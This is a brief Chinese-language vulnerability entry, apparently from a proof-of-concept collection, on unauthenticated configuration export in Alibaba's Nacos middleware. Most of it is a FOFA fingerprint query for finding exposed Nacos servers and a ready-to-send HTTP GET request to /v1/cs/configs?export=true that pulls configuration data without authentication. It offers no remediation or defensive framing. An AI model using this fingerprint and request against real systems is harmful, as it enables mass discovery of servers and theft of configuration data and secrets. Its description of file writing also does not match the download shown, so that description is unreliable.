漏洞描述
Nacos是阿里开放的一款中间件,它主要提供三种功能:持久化节点注册,非持久化节点注册和配置管理。系统存在未鉴权的接口,攻击者可直接写入文件
# Nacos未授权下载配置信息
Nacos未授权下载配置信息
## fofa
```javascript
icon_hash="13942501"
```
## poc
```java
GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
Host:
```
